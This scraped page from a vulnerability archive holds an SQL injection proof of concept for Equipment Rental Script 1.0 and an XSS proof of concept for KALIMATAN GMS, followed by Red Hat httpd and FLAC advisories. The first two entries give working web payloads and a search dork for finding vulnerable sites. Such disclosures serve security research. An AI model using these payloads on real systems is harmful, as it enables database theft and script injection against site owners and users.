Equipment Rental Script version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: Equipment Rental Script-1.0 - SQLi## Author: nu11secur1ty## Date: 09/12/2023## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/equipment-rental-script/#sectionDemo## Reference: https://portswigger.net/web-security/sql-injection## Description:The package_id parameter appears to be vulnerable to SQL injectionattacks. The payload ' was submitted in the package_id parameter, anda database error message was returned. You should review the contentsof the error message, and the application's handling of other input,to confirm whether a vulnerability is present. The attacker can stealall information from the database!STATUS: HIGH-CRITICAL Vulnerability[+]Payload:```mysql---Parameter: #1* ((custom) POST)    Type: error-based    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)    Payload: package_id=(-4488))) OR 1 GROUP BYCONCAT(0x71787a6a71,(SELECT (CASE WHEN (7794=7794) THEN 1 ELSE 0END)),0x7176717671,FLOOR(RAND(0)*2)) HAVINGMIN(0)#from(select(sleep(20)))a)&cnt=2&date_from=12/9/2023&hour_from=11&minute_from=00&date_to=12/9/2023&hour_to=12&minute_to=00---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Equipment-Rental-Script-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/09/phpjabbers-equipment-rental-script-10.html)## Time spent:00:25:00

Equipment Rental Script 1.0 SQL Injection

KALIMATAN GMS version 1.0.0 suffers from a cross site scripting vulnerability.

**KALIMATAN GMS 1.0.0 Cross Site Scripting**

Posted Sep 12, 2023

Authored by indoushka

KALIMATAN GMS version 1.0.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | bd48e4a98638b72cd97b9bc442df28c3737e9b1208d03e5a4a7f58660e0bf243

Download | Favorite | View

**KALIMATAN GMS 1.0.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : KALIMATAN GMS V1.0.0 XSS Vulnerability                                                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            | | # Vendor    : http://teppa.kaltimprov.go.id/                                                                                     |  | # Dork      : inurl:/front/grafik.php?tahun=                                                                                     |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : <script>alert(/indoushka/);</script>[+] http://Targetteppa.kaltimprovgoid/front/grafik.php?tahun=2018&bulan=%3Cscript%3Ealert(/indoushka/);%3C/script%3E Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,177)
*   Arbitrary (16,247)
*   BBS (2,859)
*   Bypass (1,743)
*   CGI (1,027)
*   Code Execution (7,301)
*   Conference (680)
*   Cracker (842)
*   CSRF (3,348)
*   DoS (23,519)
*   Encryption (2,371)
*   Exploit (52,086)
*   File Inclusion (4,228)
*   File Upload (977)
*   Firewall (821)
*   Info Disclosure (2,792)
*   Intrusion Detection (892)
*   Java (3,049)
*   JavaScript (860)
*   Kernel (6,732)
*   Local (14,499)
*   Magazine (586)
*   Overflow (12,704)
*   Perl (1,423)
*   PHP (5,152)
*   Proof of Concept (2,343)
*   Protocol (3,606)
*   Python (1,536)
*   Remote (30,852)
*   Root (3,590)
*   Rootkit (509)
*   Ruby (612)
*   Scanner (1,641)
*   Security Tool (7,895)
*   Shell (3,195)
*   Shellcode (1,216)
*   Sniffer (895)
*   Spoof (2,209)
*   SQL Injection (16,409)
*   TCP (2,407)
*   Trojan (687)
*   UDP (893)
*   Virus (666)
*   Vulnerability (31,825)
*   Web (9,695)
*   Whitepaper (3,751)
*   x86 (962)
*   XSS (17,994)
*   Other

**File Archives**

*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,005)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,833)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,323)
*   HPUX (879)
*   iOS (352)
*   iPhone (108)
*   IRIX (220)
*   Juniper (68)
*   Linux (46,676)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,841)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,896)
*   UNIX (9,306)
*   UnixWare (186)
*   Windows (6,584)
*   Other

KALIMATAN GMS 1.0.0 Cross Site Scripting

Red Hat Security Advisory 2023-5049-01 - The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server. Issues addressed include a HTTP response splitting vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: httpd:2.4 security update  
Advisory ID:       RHSA-2023:5049-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:5049  
Issue date:        2023-09-11  
CVE Names:         CVE-2023-27522   
=====================================================================

1. Summary:

An update for the httpd:2.4 module is now available for Red Hat Enterprise  
Linux 8.6 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.6) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The httpd packages provide the Apache HTTP Server, a powerful, efficient,  
and extensible web server.

Security Fix(es):

* httpd: mod_proxy_uwsgi HTTP response splitting (CVE-2023-27522)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the updated packages, the httpd daemon will be restarted  
automatically.

5. Bugs fixed (https://bugzilla.redhat.com/):

2176211 - CVE-2023-27522 httpd: mod_proxy_uwsgi HTTP response splitting

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.6):

Source:  
httpd-2.4.37-47.module+el8.6.0+19809+6e655c60.7.src.rpm  
mod_http2-1.15.7-5.module+el8.6.0+18506+34b194fb.2.src.rpm  
mod_md-2.0.8-8.module+el8.3.0+6814+67d1e611.src.rpm

aarch64:  
httpd-2.4.37-47.module+el8.6.0+19809+6e655c60.7.aarch64.rpm  
httpd-debuginfo-2.4.37-47.module+el8.6.0+19809+6e655c60.7.aarch64.rpm  
httpd-debugsource-2.4.37-47.module+el8.6.0+19809+6e655c60.7.aarch64.rpm  
httpd-devel-2.4.37-47.module+el8.6.0+19809+6e655c60.7.aarch64.rpm  
httpd-tools-2.4.37-47.module+el8.6.0+19809+6e655c60.7.aarch64.rpm  
httpd-tools-debuginfo-2.4.37-47.module+el8.6.0+19809+6e655c60.7.aarch64.rpm  
mod_http2-1.15.7-5.module+el8.6.0+18506+34b194fb.2.aarch64.rpm  
mod_http2-debuginfo-1.15.7-5.module+el8.6.0+18506+34b194fb.2.aarch64.rpm  
mod_http2-debugsource-1.15.7-5.module+el8.6.0+18506+34b194fb.2.aarch64.rpm  
mod_ldap-2.4.37-47.module+el8.6.0+19809+6e655c60.7.aarch64.rpm  
mod_ldap-debuginfo-2.4.37-47.module+el8.6.0+19809+6e655c60.7.aarch64.rpm  
mod_md-2.0.8-8.module+el8.3.0+6814+67d1e611.aarch64.rpm  
mod_md-debuginfo-2.0.8-8.module+el8.3.0+6814+67d1e611.aarch64.rpm  
mod_md-debugsource-2.0.8-8.module+el8.3.0+6814+67d1e611.aarch64.rpm  
mod_proxy_html-2.4.37-47.module+el8.6.0+19809+6e655c60.7.aarch64.rpm  
mod_proxy_html-debuginfo-2.4.37-47.module+el8.6.0+19809+6e655c60.7.aarch64.rpm  
mod_session-2.4.37-47.module+el8.6.0+19809+6e655c60.7.aarch64.rpm  
mod_session-debuginfo-2.4.37-47.module+el8.6.0+19809+6e655c60.7.aarch64.rpm  
mod_ssl-2.4.37-47.module+el8.6.0+19809+6e655c60.7.aarch64.rpm  
mod_ssl-debuginfo-2.4.37-47.module+el8.6.0+19809+6e655c60.7.aarch64.rpm

noarch:  
httpd-filesystem-2.4.37-47.module+el8.6.0+19809+6e655c60.7.noarch.rpm  
httpd-manual-2.4.37-47.module+el8.6.0+19809+6e655c60.7.noarch.rpm

ppc64le:  
httpd-2.4.37-47.module+el8.6.0+19809+6e655c60.7.ppc64le.rpm  
httpd-debuginfo-2.4.37-47.module+el8.6.0+19809+6e655c60.7.ppc64le.rpm  
httpd-debugsource-2.4.37-47.module+el8.6.0+19809+6e655c60.7.ppc64le.rpm  
httpd-devel-2.4.37-47.module+el8.6.0+19809+6e655c60.7.ppc64le.rpm  
httpd-tools-2.4.37-47.module+el8.6.0+19809+6e655c60.7.ppc64le.rpm  
httpd-tools-debuginfo-2.4.37-47.module+el8.6.0+19809+6e655c60.7.ppc64le.rpm  
mod_http2-1.15.7-5.module+el8.6.0+18506+34b194fb.2.ppc64le.rpm  
mod_http2-debuginfo-1.15.7-5.module+el8.6.0+18506+34b194fb.2.ppc64le.rpm  
mod_http2-debugsource-1.15.7-5.module+el8.6.0+18506+34b194fb.2.ppc64le.rpm  
mod_ldap-2.4.37-47.module+el8.6.0+19809+6e655c60.7.ppc64le.rpm  
mod_ldap-debuginfo-2.4.37-47.module+el8.6.0+19809+6e655c60.7.ppc64le.rpm  
mod_md-2.0.8-8.module+el8.3.0+6814+67d1e611.ppc64le.rpm  
mod_md-debuginfo-2.0.8-8.module+el8.3.0+6814+67d1e611.ppc64le.rpm  
mod_md-debugsource-2.0.8-8.module+el8.3.0+6814+67d1e611.ppc64le.rpm  
mod_proxy_html-2.4.37-47.module+el8.6.0+19809+6e655c60.7.ppc64le.rpm  
mod_proxy_html-debuginfo-2.4.37-47.module+el8.6.0+19809+6e655c60.7.ppc64le.rpm  
mod_session-2.4.37-47.module+el8.6.0+19809+6e655c60.7.ppc64le.rpm  
mod_session-debuginfo-2.4.37-47.module+el8.6.0+19809+6e655c60.7.ppc64le.rpm  
mod_ssl-2.4.37-47.module+el8.6.0+19809+6e655c60.7.ppc64le.rpm  
mod_ssl-debuginfo-2.4.37-47.module+el8.6.0+19809+6e655c60.7.ppc64le.rpm

s390x:  
httpd-2.4.37-47.module+el8.6.0+19809+6e655c60.7.s390x.rpm  
httpd-debuginfo-2.4.37-47.module+el8.6.0+19809+6e655c60.7.s390x.rpm  
httpd-debugsource-2.4.37-47.module+el8.6.0+19809+6e655c60.7.s390x.rpm  
httpd-devel-2.4.37-47.module+el8.6.0+19809+6e655c60.7.s390x.rpm  
httpd-tools-2.4.37-47.module+el8.6.0+19809+6e655c60.7.s390x.rpm  
httpd-tools-debuginfo-2.4.37-47.module+el8.6.0+19809+6e655c60.7.s390x.rpm  
mod_http2-1.15.7-5.module+el8.6.0+18506+34b194fb.2.s390x.rpm  
mod_http2-debuginfo-1.15.7-5.module+el8.6.0+18506+34b194fb.2.s390x.rpm  
mod_http2-debugsource-1.15.7-5.module+el8.6.0+18506+34b194fb.2.s390x.rpm  
mod_ldap-2.4.37-47.module+el8.6.0+19809+6e655c60.7.s390x.rpm  
mod_ldap-debuginfo-2.4.37-47.module+el8.6.0+19809+6e655c60.7.s390x.rpm  
mod_md-2.0.8-8.module+el8.3.0+6814+67d1e611.s390x.rpm  
mod_md-debuginfo-2.0.8-8.module+el8.3.0+6814+67d1e611.s390x.rpm  
mod_md-debugsource-2.0.8-8.module+el8.3.0+6814+67d1e611.s390x.rpm  
mod_proxy_html-2.4.37-47.module+el8.6.0+19809+6e655c60.7.s390x.rpm  
mod_proxy_html-debuginfo-2.4.37-47.module+el8.6.0+19809+6e655c60.7.s390x.rpm  
mod_session-2.4.37-47.module+el8.6.0+19809+6e655c60.7.s390x.rpm  
mod_session-debuginfo-2.4.37-47.module+el8.6.0+19809+6e655c60.7.s390x.rpm  
mod_ssl-2.4.37-47.module+el8.6.0+19809+6e655c60.7.s390x.rpm  
mod_ssl-debuginfo-2.4.37-47.module+el8.6.0+19809+6e655c60.7.s390x.rpm

x86_64:  
httpd-2.4.37-47.module+el8.6.0+19809+6e655c60.7.x86_64.rpm  
httpd-debuginfo-2.4.37-47.module+el8.6.0+19809+6e655c60.7.x86_64.rpm  
httpd-debugsource-2.4.37-47.module+el8.6.0+19809+6e655c60.7.x86_64.rpm  
httpd-devel-2.4.37-47.module+el8.6.0+19809+6e655c60.7.x86_64.rpm  
httpd-tools-2.4.37-47.module+el8.6.0+19809+6e655c60.7.x86_64.rpm  
httpd-tools-debuginfo-2.4.37-47.module+el8.6.0+19809+6e655c60.7.x86_64.rpm  
mod_http2-1.15.7-5.module+el8.6.0+18506+34b194fb.2.x86_64.rpm  
mod_http2-debuginfo-1.15.7-5.module+el8.6.0+18506+34b194fb.2.x86_64.rpm  
mod_http2-debugsource-1.15.7-5.module+el8.6.0+18506+34b194fb.2.x86_64.rpm  
mod_ldap-2.4.37-47.module+el8.6.0+19809+6e655c60.7.x86_64.rpm  
mod_ldap-debuginfo-2.4.37-47.module+el8.6.0+19809+6e655c60.7.x86_64.rpm  
mod_md-2.0.8-8.module+el8.3.0+6814+67d1e611.x86_64.rpm  
mod_md-debuginfo-2.0.8-8.module+el8.3.0+6814+67d1e611.x86_64.rpm  
mod_md-debugsource-2.0.8-8.module+el8.3.0+6814+67d1e611.x86_64.rpm  
mod_proxy_html-2.4.37-47.module+el8.6.0+19809+6e655c60.7.x86_64.rpm  
mod_proxy_html-debuginfo-2.4.37-47.module+el8.6.0+19809+6e655c60.7.x86_64.rpm  
mod_session-2.4.37-47.module+el8.6.0+19809+6e655c60.7.x86_64.rpm  
mod_session-debuginfo-2.4.37-47.module+el8.6.0+19809+6e655c60.7.x86_64.rpm  
mod_ssl-2.4.37-47.module+el8.6.0+19809+6e655c60.7.x86_64.rpm  
mod_ssl-debuginfo-2.4.37-47.module+el8.6.0+19809+6e655c60.7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-27522  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk/2W0AAoJENzjgjWX9erENcYQAKesqAd2jobASzUoBLMgYLyp  
pkbyijzbSX5OoW6lEKxDQWlnXF5G8h1jW4KQANXeWOPnLC9eO+rLE3DUEfkzR06O  
+kAyo4GmFLfS+ZQizEz6s+q8WE/UvDq4h+NlDHTF4ZfsDJgXHlWrCcLxBRWJxc/Q  
7urCx2piqclrr3kV/S+cbDozNKd4ea7fQacFQG6oWweBKlqtrpeI9b4BNCPG090s  
zEUVW/ZtZKii4EeRhcR5E8WElDFfDRhpe9MXLD49T5GrRHxX6FOGDAOBep/pIfNW  
+LmBHJobvv/6OV3ySGCDG1CtTk8pJGJYpwXKhcXClMKx84nKFAwYQQRSmnePQH58  
ciiEivfyJZuTIudJOWF2N6QuOqXxfSTfeYZjgLNTJxTEBxtEanuvh6noxjR3MlDL  
j6iWQpWITUPpCaYSQRe4pJdNR9ZWDU8mqnF5sgsUAkbwEQ6zZlTTGDLdpJY768LH  
3ditvVRvOXmzhLMtRtiy7v9ZBP2BLq9+T/wiqxLhWNF4MZ4yZiF8oNfE1r4m+W98  
K/L2mVFcuOwQJ+eshjuOW5VcvH9Q8fj7wo9swgvHqa47xIXVJCW7Gy8sdK4nxPJ9  
AYMEsIm8zYJvWuk3XhqiNV8o8v9JbPYAcITreJ6plZEbsqqqii4t85uhFFpmF47w  
8fr9AxnFjoF7bAfBE5df  
=yAMQ  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-5049-01

Red Hat Security Advisory 2023-5046-01 - FLAC stands for Free Lossless Audio Codec. FLAC is similar to Ogg Vorbis, but lossless. The FLAC project consists of the stream format, reference encoders and decoders in library form, a command-line program to encode and decode FLAC files, and a command-line metadata editor for FLAC files. Issues addressed include a code execution vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: flac security update  
Advisory ID:       RHSA-2023:5046-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:5046  
Issue date:        2023-09-11  
CVE Names:         CVE-2020-22219   
=====================================================================

1. Summary:

An update for flac is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux CRB (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

FLAC stands for Free Lossless Audio Codec. FLAC is similar to Ogg Vorbis,  
but lossless. The FLAC project consists of the stream format, reference  
encoders and decoders in library form, a command-line program to encode and  
decode FLAC files, and a command-line metadata editor for FLAC files.

Security Fix(es):

* flac: Remote Code Execution (RCE) via the bitwriter_grow_ function, by  
supplying crafted input to the encoder (CVE-2020-22219)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2235489 - CVE-2020-22219 flac: Remote Code Execution (RCE) via the bitwriter_grow_ function, by supplying crafted input to the encoder

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
flac-1.3.2-9.el8_8.1.src.rpm

aarch64:  
flac-debuginfo-1.3.2-9.el8_8.1.aarch64.rpm  
flac-debugsource-1.3.2-9.el8_8.1.aarch64.rpm  
flac-libs-1.3.2-9.el8_8.1.aarch64.rpm  
flac-libs-debuginfo-1.3.2-9.el8_8.1.aarch64.rpm

ppc64le:  
flac-debuginfo-1.3.2-9.el8_8.1.ppc64le.rpm  
flac-debugsource-1.3.2-9.el8_8.1.ppc64le.rpm  
flac-libs-1.3.2-9.el8_8.1.ppc64le.rpm  
flac-libs-debuginfo-1.3.2-9.el8_8.1.ppc64le.rpm

s390x:  
flac-debuginfo-1.3.2-9.el8_8.1.s390x.rpm  
flac-debugsource-1.3.2-9.el8_8.1.s390x.rpm  
flac-libs-1.3.2-9.el8_8.1.s390x.rpm  
flac-libs-debuginfo-1.3.2-9.el8_8.1.s390x.rpm

x86_64:  
flac-debuginfo-1.3.2-9.el8_8.1.i686.rpm  
flac-debuginfo-1.3.2-9.el8_8.1.x86_64.rpm  
flac-debugsource-1.3.2-9.el8_8.1.i686.rpm  
flac-debugsource-1.3.2-9.el8_8.1.x86_64.rpm  
flac-libs-1.3.2-9.el8_8.1.i686.rpm  
flac-libs-1.3.2-9.el8_8.1.x86_64.rpm  
flac-libs-debuginfo-1.3.2-9.el8_8.1.i686.rpm  
flac-libs-debuginfo-1.3.2-9.el8_8.1.x86_64.rpm

Red Hat Enterprise Linux CRB (v. 8):

aarch64:  
flac-1.3.2-9.el8_8.1.aarch64.rpm  
flac-debuginfo-1.3.2-9.el8_8.1.aarch64.rpm  
flac-debugsource-1.3.2-9.el8_8.1.aarch64.rpm  
flac-devel-1.3.2-9.el8_8.1.aarch64.rpm  
flac-libs-debuginfo-1.3.2-9.el8_8.1.aarch64.rpm

ppc64le:  
flac-1.3.2-9.el8_8.1.ppc64le.rpm  
flac-debuginfo-1.3.2-9.el8_8.1.ppc64le.rpm  
flac-debugsource-1.3.2-9.el8_8.1.ppc64le.rpm  
flac-devel-1.3.2-9.el8_8.1.ppc64le.rpm  
flac-libs-debuginfo-1.3.2-9.el8_8.1.ppc64le.rpm

s390x:  
flac-1.3.2-9.el8_8.1.s390x.rpm  
flac-debuginfo-1.3.2-9.el8_8.1.s390x.rpm  
flac-debugsource-1.3.2-9.el8_8.1.s390x.rpm  
flac-devel-1.3.2-9.el8_8.1.s390x.rpm  
flac-libs-debuginfo-1.3.2-9.el8_8.1.s390x.rpm

x86_64:  
flac-1.3.2-9.el8_8.1.x86_64.rpm  
flac-debuginfo-1.3.2-9.el8_8.1.i686.rpm  
flac-debuginfo-1.3.2-9.el8_8.1.x86_64.rpm  
flac-debugsource-1.3.2-9.el8_8.1.i686.rpm  
flac-debugsource-1.3.2-9.el8_8.1.x86_64.rpm  
flac-devel-1.3.2-9.el8_8.1.i686.rpm  
flac-devel-1.3.2-9.el8_8.1.x86_64.rpm  
flac-libs-debuginfo-1.3.2-9.el8_8.1.i686.rpm  
flac-libs-debuginfo-1.3.2-9.el8_8.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2020-22219  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk/2WzAAoJENzjgjWX9erEd9gP/jJhB0S9tuNx2+FuV7xFuXo5  
rWEQ9lVv/6JsImQUYgY2LjaftH4xnIHATGFFKlD9a3beieFBTBCLlCcZS1Hj6hXP  
LIvcLWsaMtjp2h2vMSv18Lgbcm3Zuo0JoWeOf7FbOVLlalOvTOuZR3nMtiWomUfk  
vaPHhBymCLhrWkk4PSrUysSz9rl7MWcPTylo0tB1rr3VAxIToSty+JbQ3qmOiUbE  
FuNqnP1n5k4Web+cMlqTFQpMCW+myIhv3iMuQOT1gZ1GldPlpsmYUH3JZ4GsdT++  
48KjjmQmAhxqVpTUmsukFdNM+4VxaEse6GLp8yvW4gT0kdUbxSIBflgWtYwTKCou  
yhBtzUDlnlGnsnqnedDfUTbB60gJ3zuiwUmL9qBbVk5v+FzDm/3ltrgjVV8eeaPh  
TlkWqENYfHiMRUowCfv/Pp0Gx1Lc0jbZtA9ZPUKB5KJmarSYL/kfOdyg0KKsBO5V  
8ypSnFccmVf971cQziId2J1dAtE30qrcr4ZhiphQ3CCurwWy4v8lzCBWtt5J2qNE  
+WGcJ92O+39OISdS7/lwFR69B4ok90H6COME4eWcA2owO3PszhQX4YL7X4IurmUp  
NfuZYi9ntCOc8VhvEFYhBfqEY76wC+l4OoweCQ//4M4m2FJHGBmryxNhM4yLGLlt  
18vkKbOjfL4CxSxATfJi  
=7pXT  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-5046-01

Red Hat Security Advisory 2023-5050-01 - The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server. Issues addressed include a HTTP response splitting vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: httpd:2.4 security update  
Advisory ID:       RHSA-2023:5050-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:5050  
Issue date:        2023-09-11  
CVE Names:         CVE-2023-27522   
=====================================================================

1. Summary:

An update for the httpd:2.4 module is now available for Red Hat Enterprise  
Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The httpd packages provide the Apache HTTP Server, a powerful, efficient,  
and extensible web server.

Security Fix(es):

* httpd: mod_proxy_uwsgi HTTP response splitting (CVE-2023-27522)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the updated packages, the httpd daemon will be restarted  
automatically.

5. Bugs fixed (https://bugzilla.redhat.com/):

2176211 - CVE-2023-27522 httpd: mod_proxy_uwsgi HTTP response splitting

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
httpd-2.4.37-56.module+el8.8.0+19808+379766d6.7.src.rpm  
mod_http2-1.15.7-8.module+el8.8.0+18751+b4557bca.3.src.rpm  
mod_md-2.0.8-8.module+el8.3.0+6814+67d1e611.src.rpm

aarch64:  
httpd-2.4.37-56.module+el8.8.0+19808+379766d6.7.aarch64.rpm  
httpd-debuginfo-2.4.37-56.module+el8.8.0+19808+379766d6.7.aarch64.rpm  
httpd-debugsource-2.4.37-56.module+el8.8.0+19808+379766d6.7.aarch64.rpm  
httpd-devel-2.4.37-56.module+el8.8.0+19808+379766d6.7.aarch64.rpm  
httpd-tools-2.4.37-56.module+el8.8.0+19808+379766d6.7.aarch64.rpm  
httpd-tools-debuginfo-2.4.37-56.module+el8.8.0+19808+379766d6.7.aarch64.rpm  
mod_http2-1.15.7-8.module+el8.8.0+18751+b4557bca.3.aarch64.rpm  
mod_http2-debuginfo-1.15.7-8.module+el8.8.0+18751+b4557bca.3.aarch64.rpm  
mod_http2-debugsource-1.15.7-8.module+el8.8.0+18751+b4557bca.3.aarch64.rpm  
mod_ldap-2.4.37-56.module+el8.8.0+19808+379766d6.7.aarch64.rpm  
mod_ldap-debuginfo-2.4.37-56.module+el8.8.0+19808+379766d6.7.aarch64.rpm  
mod_md-2.0.8-8.module+el8.3.0+6814+67d1e611.aarch64.rpm  
mod_md-debuginfo-2.0.8-8.module+el8.3.0+6814+67d1e611.aarch64.rpm  
mod_md-debugsource-2.0.8-8.module+el8.3.0+6814+67d1e611.aarch64.rpm  
mod_proxy_html-2.4.37-56.module+el8.8.0+19808+379766d6.7.aarch64.rpm  
mod_proxy_html-debuginfo-2.4.37-56.module+el8.8.0+19808+379766d6.7.aarch64.rpm  
mod_session-2.4.37-56.module+el8.8.0+19808+379766d6.7.aarch64.rpm  
mod_session-debuginfo-2.4.37-56.module+el8.8.0+19808+379766d6.7.aarch64.rpm  
mod_ssl-2.4.37-56.module+el8.8.0+19808+379766d6.7.aarch64.rpm  
mod_ssl-debuginfo-2.4.37-56.module+el8.8.0+19808+379766d6.7.aarch64.rpm

noarch:  
httpd-filesystem-2.4.37-56.module+el8.8.0+19808+379766d6.7.noarch.rpm  
httpd-manual-2.4.37-56.module+el8.8.0+19808+379766d6.7.noarch.rpm

ppc64le:  
httpd-2.4.37-56.module+el8.8.0+19808+379766d6.7.ppc64le.rpm  
httpd-debuginfo-2.4.37-56.module+el8.8.0+19808+379766d6.7.ppc64le.rpm  
httpd-debugsource-2.4.37-56.module+el8.8.0+19808+379766d6.7.ppc64le.rpm  
httpd-devel-2.4.37-56.module+el8.8.0+19808+379766d6.7.ppc64le.rpm  
httpd-tools-2.4.37-56.module+el8.8.0+19808+379766d6.7.ppc64le.rpm  
httpd-tools-debuginfo-2.4.37-56.module+el8.8.0+19808+379766d6.7.ppc64le.rpm  
mod_http2-1.15.7-8.module+el8.8.0+18751+b4557bca.3.ppc64le.rpm  
mod_http2-debuginfo-1.15.7-8.module+el8.8.0+18751+b4557bca.3.ppc64le.rpm  
mod_http2-debugsource-1.15.7-8.module+el8.8.0+18751+b4557bca.3.ppc64le.rpm  
mod_ldap-2.4.37-56.module+el8.8.0+19808+379766d6.7.ppc64le.rpm  
mod_ldap-debuginfo-2.4.37-56.module+el8.8.0+19808+379766d6.7.ppc64le.rpm  
mod_md-2.0.8-8.module+el8.3.0+6814+67d1e611.ppc64le.rpm  
mod_md-debuginfo-2.0.8-8.module+el8.3.0+6814+67d1e611.ppc64le.rpm  
mod_md-debugsource-2.0.8-8.module+el8.3.0+6814+67d1e611.ppc64le.rpm  
mod_proxy_html-2.4.37-56.module+el8.8.0+19808+379766d6.7.ppc64le.rpm  
mod_proxy_html-debuginfo-2.4.37-56.module+el8.8.0+19808+379766d6.7.ppc64le.rpm  
mod_session-2.4.37-56.module+el8.8.0+19808+379766d6.7.ppc64le.rpm  
mod_session-debuginfo-2.4.37-56.module+el8.8.0+19808+379766d6.7.ppc64le.rpm  
mod_ssl-2.4.37-56.module+el8.8.0+19808+379766d6.7.ppc64le.rpm  
mod_ssl-debuginfo-2.4.37-56.module+el8.8.0+19808+379766d6.7.ppc64le.rpm

s390x:  
httpd-2.4.37-56.module+el8.8.0+19808+379766d6.7.s390x.rpm  
httpd-debuginfo-2.4.37-56.module+el8.8.0+19808+379766d6.7.s390x.rpm  
httpd-debugsource-2.4.37-56.module+el8.8.0+19808+379766d6.7.s390x.rpm  
httpd-devel-2.4.37-56.module+el8.8.0+19808+379766d6.7.s390x.rpm  
httpd-tools-2.4.37-56.module+el8.8.0+19808+379766d6.7.s390x.rpm  
httpd-tools-debuginfo-2.4.37-56.module+el8.8.0+19808+379766d6.7.s390x.rpm  
mod_http2-1.15.7-8.module+el8.8.0+18751+b4557bca.3.s390x.rpm  
mod_http2-debuginfo-1.15.7-8.module+el8.8.0+18751+b4557bca.3.s390x.rpm  
